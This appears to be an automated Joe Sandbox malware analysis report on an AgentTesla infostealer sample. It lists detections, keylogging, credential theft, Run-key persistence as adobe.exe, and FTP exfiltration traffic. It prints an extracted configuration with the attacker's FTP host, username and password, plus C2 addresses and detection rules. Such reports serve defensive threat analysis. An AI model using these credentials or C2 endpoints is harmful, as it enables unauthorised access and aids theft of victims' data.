Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ukBQ4ch2nE.exe

Overview

General Information

Sample name:ukBQ4ch2nE.exe
renamed because original name is a hash value
Original sample name:edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26.exe
Analysis ID:1588356
MD5:74421477fafaf6beb9d8e3806e1f6643
SHA1:44857e574c1892ef8a3f8c8f41c5c0c0aab20b83
SHA256:edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ukBQ4ch2nE.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\ukBQ4ch2nE.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)
    • ukBQ4ch2nE.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\ukBQ4ch2nE.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)
  • adobe.exe (PID: 516 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)
    • adobe.exe (PID: 1400 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)
  • adobe.exe (PID: 6284 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)
    • adobe.exe (PID: 3000 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 16 entries
              SourceRuleDescriptionAuthorStrings
              5.2.adobe.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.adobe.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.2.adobe.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x33f56:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x33fc8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x34052:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x340e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3414e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x341c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x34256:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x342e6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  5.2.adobe.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x31239:$s2: GetPrivateProfileString
                  • 0x30944:$s3: get_OSFullName
                  • 0x31f6e:$s5: remove_Key
                  • 0x32113:$s5: remove_Key
                  • 0x33072:$s6: FtpWebRequest
                  • 0x33f38:$s7: logins
                  • 0x344aa:$s7: logins
                  • 0x371bb:$s7: logins
                  • 0x3726d:$s7: logins
                  • 0x38bbe:$s7: logins
                  • 0x37e07:$s9: 1.85 (Hash, version 2, native byte-order)
                  1.2.ukBQ4ch2nE.exe.4511c80.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ukBQ4ch2nE.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T01:15:25.002925+010020299271A Network Trojan was detected192.168.2.1149712213.189.52.18121TCP
                    2025-01-11T01:15:36.646308+010020299271A Network Trojan was detected192.168.2.1149718213.189.52.18121TCP
                    2025-01-11T01:15:44.430083+010020299271A Network Trojan was detected192.168.2.1149726213.189.52.18121TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T01:15:25.560566+010028555421A Network Trojan was detected192.168.2.1149713213.189.52.18165516TCP
                    2025-01-11T01:15:25.566865+010028555421A Network Trojan was detected192.168.2.1149713213.189.52.18165516TCP
                    2025-01-11T01:15:37.203280+010028555421A Network Trojan was detected192.168.2.1149721213.189.52.18164074TCP
                    2025-01-11T01:15:37.208459+010028555421A Network Trojan was detected192.168.2.1149721213.189.52.18164074TCP
                    2025-01-11T01:15:44.991137+010028555421A Network Trojan was detected192.168.2.1149727213.189.52.18163872TCP
                    2025-01-11T01:15:44.996483+010028555421A Network Trojan was detected192.168.2.1149727213.189.52.18163872TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T01:16:57.647871+010018000071A Network Trojan was detected192.168.2.1149929213.189.52.18163898TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: ukBQ4ch2nE.exeAvira: detected
                    Source: http://s4.serv00.comAvira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeAvira: detection malicious, Label: HEUR/AGEN.1306767
                    Source: 5.2.adobe.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeReversingLabs: Detection: 73%
                    Source: ukBQ4ch2nE.exeVirustotal: Detection: 75%Perma Link
                    Source: ukBQ4ch2nE.exeReversingLabs: Detection: 73%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJoe Sandbox ML: detected
                    Source: ukBQ4ch2nE.exeJoe Sandbox ML: detected
                    Source: ukBQ4ch2nE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49725 version: TLS 1.2
                    Source: ukBQ4ch2nE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49721 -> 213.189.52.181:64074
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49727 -> 213.189.52.181:63872
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49713 -> 213.189.52.181:65516
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49712 -> 213.189.52.181:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49718 -> 213.189.52.181:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49726 -> 213.189.52.181:21
                    Source: Network trafficSuricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.11:49929 -> 213.189.52.181:63898
                    Source: global trafficTCP traffic: 213.189.52.181 ports 63872,65516,63898,1,2,64074,21
                    Source: global trafficTCP traffic: 192.168.2.11:49713 -> 213.189.52.181:65516
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 213.189.52.181 213.189.52.181
                    Source: Joe Sandbox ViewASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.11:49712 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                    Source: adobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: adobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s4.serv00.com
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49725 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\ukBQ4ch2nE.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 1_2_0316DEE41_2_0316DEE4
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 1_2_058700071_2_05870007
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 1_2_058700401_2_05870040
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B9F2082_2_00B9F208
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B9B3A32_2_00B9B3A3
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B9E3202_2_00B9E320
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B94A902_2_00B94A90
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B93E782_2_00B93E78
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B941C02_2_00B941C0
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_065E2A5A2_2_065E2A5A
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_065E2A682_2_065E2A68
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066362382_2_06636238
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066330A82_2_066330A8
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066351E82_2_066351E8
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_0663C1D82_2_0663C1D8
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_0663AE6A2_2_0663AE6A
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_0663591B2_2_0663591B
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066379C82_2_066379C8
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_0663E4002_2_0663E400
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066372E82_2_066372E8
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066300402_2_06630040
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_066300072_2_06630007
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0144DEE44_2_0144DEE4
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_055900404_2_05590040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_055900064_2_05590006
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013AE0F85_2_013AE0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013AE8A95_2_013AE8A9
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013A4A905_2_013A4A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013A3E785_2_013A3E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013A41C05_2_013A41C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013AADA85_2_013AADA8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B766385_2_06B76638
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B734A85_2_06B734A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B755E85_2_06B755E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B77DC85_2_06B77DC8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B7B26F5_2_06B7B26F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B7C1D85_2_06B7C1D8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B776E85_2_06B776E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B7E4005_2_06B7E400
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B75D1B5_2_06B75D1B
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B700405_2_06B70040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06C624625_2_06C62462
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06C624685_2_06C62468
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06B700065_2_06B70006
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_0100DEE47_2_0100DEE4
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029CE0F88_2_029CE0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029C4A908_2_029C4A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029CE8A98_2_029CE8A9
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029C3E788_2_029C3E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029C41C08_2_029C41C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029CADA88_2_029CADA8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F66388_2_066F6638
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F34A88_2_066F34A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F55E88_2_066F55E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F7DC88_2_066F7DC8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066FB26F8_2_066FB26F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066FC1D88_2_066FC1D8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F76E88_2_066F76E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066FE4008_2_066FE400
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F5D1B8_2_066F5D1B
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F00408_2_066F0040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066F00068_2_066F0006
                    Source: ukBQ4ch2nE.exe, 00000001.00000000.1568968404.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFanto.exe, vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exe, 00000001.00000002.1576675585.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSoftwareGame.dll: vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exe, 00000001.00000002.1579542545.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4033798596.00000000007D9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4034617232.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exeBinary or memory string: OriginalFilenameFanto.exe, vs ukBQ4ch2nE.exe
                    Source: ukBQ4ch2nE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
